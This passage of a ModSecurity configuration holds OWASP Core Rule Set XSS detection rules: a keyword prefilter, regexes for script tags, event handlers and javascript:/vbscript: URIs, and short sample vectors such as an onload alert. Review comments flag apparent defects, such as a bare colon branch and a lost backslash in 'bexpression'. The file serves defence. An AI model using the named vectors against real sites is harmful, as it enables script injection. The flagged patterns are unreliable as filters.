# "[[\s\S]" followed by a repeated literal "]" - this looks unintended;
# confirm against the rule author's intent before relying on that branch.
#
SecRule ARGS "(?i)(<script[^>]*>[\s\S]*?<\/script[^>]*>|<script[^>]*>[\s\S]*?<\/script[[\s\S]]*[\s\S]|<script[^>]*>[\s\S]*?<\/script[\s]*[\s]|<script[^>]*>[\s\S]*?<\/script|<script[^>]*>[\s\S]*?)" "id:'973336',phase:2,rev:'1',ver:'OWASP_CRS/2.2.8',maturity:'1',accuracy:'8',t:none,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,log,capture,msg:'XSS Filter - Category 1: Script Tag Vector',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}"

#
# -=[ XSS Filters - Category 2 ]=-
# XSS vectors making use of event handlers like onerror, onload etc, e.g., <body onload="alert(1)">
#
# Rule 973337 has the same scope, transformations and scoring as 973336.
# The pattern is a run of whitespace, quote, backtick, semicolon, slash,
# digit or "=" characters followed by "on", word characters and "=".
#
# NOTE(review): the pattern is not tied to an HTML tag, so ordinary
# key=value text whose key starts with "on" will also match. The rule
# declares maturity 1; review its hits in the audit log before letting its
# anomaly score drive blocking.
#
SecRule ARGS "(?i)([\s\"'`;\/0-9\=]+on\w+\s*=)" "id:'973337',phase:2,t:none,rev:'1',ver:'OWASP_CRS/2.2.8',maturity:'1',accuracy:'8',t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,log,capture,msg:'XSS Filter - Category 2: Event Handler Vector',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}"

#
# -=[ XSS Filters - Category 3 ]=-
# XSS vectors making use of JavaScript URIs, e.g., <p style="background:url(javascript:alert(1))">
#
# Rule 973338 has the same scope, transformations and scoring as 973336.
#
# NOTE(review): as written here the second alternative is a bare ":", so
# any argument value containing a colon (a URL, a timestamp) matches and
# receives the critical anomaly score; the first alternative also ends in
# ":" and is therefore subsumed by it. Confirm against the upstream rule
# file that this branch was not meant to be an escaped or entity-encoded
# form of the colon that was lost in transcription.
# NOTE(review): the [\s\S]src[\s\S], [\s\S]style[\s\S], [\s\S]base64[\s\S],
# [\s\S]xmlns[\s\S] and [\s\S]xhtml[\s\S] branches match those substrings
# anywhere with one character on each side, and the trailing lazy [\s\S]*?
# on the <style>, <applet>, <meta> and <object> branches can match nothing,
# so those reduce to the opening tag. Expect a high false-positive rate.
#
SecRule ARGS "(?i)((?:=|U\s*R\s*L\s*\()\s*[^>]*\s*S\s*C\s*R\s*I\s*P\s*T\s*:|:|[\s\S]allowscriptaccess[\s\S]|[\s\S]src[\s\S]|[\s\S]data:text\/html[\s\S]|[\s\S]xlink:href[\s\S]|[\s\S]base64[\s\S]|[\s\S]xmlns[\s\S]|[\s\S]xhtml[\s\S]|[\s\S]style[\s\S]|<style[^>]*>[\s\S]*?|[\s\S]@import[\s\S]|<applet[^>]*>[\s\S]*?|<meta[^>]*>[\s\S]*?|<object[^>]*>[\s\S]*?)" "id:'973338',phase:2,t:none,rev:'1',ver:'OWASP_CRS/2.2.8',maturity:'1',accuracy:'8',t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,log,capture,tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',msg:'XSS Filter - Category 3: Javascript URI Vector',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}"

#
# XSS
#
# Phrase-match prefilter (rule 981136; its action list is on the following
# line). It runs @pm over cookies (except those matching /__utm/), cookie
# names, argument names, arguments and XML after htmlEntityDecode,
# compressWhiteSpace and lowercase, and on a hit only raises
# tx.pm_xss_score (pass,nolog). Rule 981018 then jumps to END_XSS_CHECK
# when that variable was never set, so the keyword regex rules that follow
# are evaluated only for requests containing one of these phrases.
#
# NOTE(review): because this list gates those regex rules, a keyword a
# rule depends on but that is absent here disables that rule without any
# log entry. The list carries "bexpression" rather than "expression",
# mirroring the ".*bexpression\b" in rule 958034 further down; that looks
# like a "\bexpression" that lost its backslash, in which case neither the
# prefilter nor 958034 covers a plain CSS expression() value. Verify both
# and correct them together.
#
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pm jscript onsubmit copyparentfolder document javascript meta onchange onmove onkeydown onkeyup activexobject onerror onmouseup ecmascript bexpression onmouseover vbscript: <![cdata[ http: .innerhtml settimeout shell: onabort asfunction: onkeypress onmousedown onclick .fromcharcode background-image: x-javascript ondragdrop onblur mocha: javascript: onfocus lowsrc getparentfolder onresize @import alert script onselect onmouseout application onmousemove background .execscript livescript: vbscript getspecialfolder .addimport iframe onunload createtextrange <input onload" \
"phase:2,id:'981136',rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,pass,nolog,setvar:tx.pm_xss_score=+%{tx.critical_anomaly_score}" SecRule &TX:PM_XSS_SCORE "@eq 0" "phase:2,id:'981018',t:none,pass,skipAfter:END_XSS_CHECK,nolog" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bgetparentfolder\b" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958016',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bonmousedown\b\W*?\=" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958414',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bsrc\b\W*?\bshell:" \ 
"phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958032',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bmocha:" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958026',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bonabort\b" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958027',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: 
%{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\blowsrc\b\W*?\bhttp:" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958054',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bonmouseup\b\W*?\=" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958418',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bstyle\b\W*\=.*bexpression\b\W*\(" \ 
"phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958034',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bhref\b\W*?\bshell:" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958019',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bcreatetextrange\b" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958013',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: 
%{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bondragdrop\b\W*?\=" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958408',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bcopyparentfolder\b" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958012',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bonunload\b\W*?\=" \ 
"phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958423',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\.execscript\b" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958002',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bgetspecialfolder\b" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958017',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: 
%{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "<body\b.*?\bonload\b" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958007',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\burl\b\W*?\bvbscript:" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958047',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bonkeydown\b\W*?\=" \ 
"phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958410',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bonmousemove\b\W*?\=" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958415',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\blivescript:" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958022',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: 
%{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bonblur\b\W*?\=" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958405',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bonmove\b\W*?\=" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'8',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Cross-site Scripting (XSS) Attack',id:'958419',tag:'OWASP_CRS/WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bsettimeout\b\W*?\(" \ 
